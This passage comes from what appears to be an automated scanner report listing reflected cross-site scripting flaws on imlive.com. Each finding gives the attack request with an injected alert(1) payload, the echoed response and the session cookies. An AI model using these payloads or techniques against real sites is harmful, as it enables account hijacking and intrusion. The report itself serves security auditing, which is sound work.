Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIANFYd9Qok%2fkykcMIgmZjKoQL2Fau65ih2OqtICLHe6Q3eP1TKxG1T%2bPy4j2Jq7jhcGjt6%2fBNVb76RzfvkzfqVaz3rHjvWW%2bqEgtHilu1omsK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:41 GMT
Connection: close
Content-Length: 19663
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/homepage.aspx&he=imlive.com&ul=/?17713'-alert(1)-'0edf03efbd6=1&qs=17713'-alert(1)-'0edf03efbd6=1&qs=17713'-alert(1)-'0edf03efbd6=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function
...[SNIP]...

4.479. http://imlive.com/SiteInformation.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /SiteInformation.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 652a8'onerror%3d'alert(1)'f61ce20483c was submitted in the REST URL parameter 1. This input was echoed as 652a8'onerror='alert(1)'f61ce20483c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /652a8'onerror%3d'alert(1)'f61ce20483c HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:56 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:56 GMT
Connection: close
Content-Length: 8302
Vary: Accept-Encoding


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/652a8'onerror='alert(1)'f61ce20483c/&lr=1107816009&ud=0&pe=404.asp&qs=404;http://imlive.com:80/652a8'onerror='alert(1)'f61ce20483c/&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.480. http://imlive.com/awardarena/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /awardarena/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9ece"><a>e6c79bedc05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /awardarena/?c9ece"><a>e6c79bedc05=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:54 GMT
Connection: close
Content-Length: 25222
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/awardarena/?c9ece"><a>e6c79bedc05=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.481. http://imlive.com/awardarena/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /awardarena/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80d56'-alert(1)-'698666eeaa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /awardarena/?80d56'-alert(1)-'698666eeaa0=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:57 GMT
Connection: close
Content-Length: 25371
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostawards.aspx&he=imlive.com&ul=/awardarena/?80d56'-alert(1)-'698666eeaa0=1&qs=80d56'-alert(1)-'698666eeaa0=1&qs=80d56'-alert(1)-'698666eeaa0=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function
...[SNIP]...

4.482. http://imlive.com/become_celeb.asp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /become_celeb.asp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 47df2'onerror%3d'alert(1)'f893addb900 was submitted in the REST URL parameter 1. This input was echoed as 47df2'onerror='alert(1)'f893addb900 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /47df2'onerror%3d'alert(1)'f893addb900 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:12 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:11 GMT
Connection: close
Content-Length: 19702
Vary: Accept-Encoding


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/47df2'onerror='alert(1)'f893addb900/&lr=1107816008&ud=0&pe=404.asp&qs=404;http://imlive.com:80/47df2'onerror='alert(1)'f893addb900/&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.483. http://imlive.com/become_host.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /become_host.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15c68'-alert(1)-'911a666a53f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /become_host.asp?15c68'-alert(1)-'911a666a53f=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:27 GMT
Connection: close
Content-Length: 21781
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/becomehost.aspx&he=imlive.com&ul=/becomehost.aspx?15c68'-alert(1)-'911a666a53f=1&qs=15c68'-alert(1)-'911a666a53f=1&qs=15c68'-alert(1)-'911a666a53f=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function
...[SNIP]...

4.484. http://imlive.com/become_host.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /become_host.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8175d"><a>ad0c10fb84f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /become_host.asp?8175d"><a>ad0c10fb84f=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:23 GMT
Connection: close
Content-Length: 21593
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/becomehost.aspx?8175d"><a>ad0c10fb84f=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.485. http://imlive.com/becomehost.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /becomehost.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae13c"><a>8ef4c400f3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /becomehost.aspx?ae13c"><a>8ef4c400f3a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:56 GMT
Connection: close
Content-Length: 21593
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/becomehost.aspx?ae13c"><a>8ef4c400f3a=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.486. http://imlive.com/becomehost.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /becomehost.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbb67'-alert(1)-'15501fee645 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /becomehost.aspx?cbb67'-alert(1)-'15501fee645=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
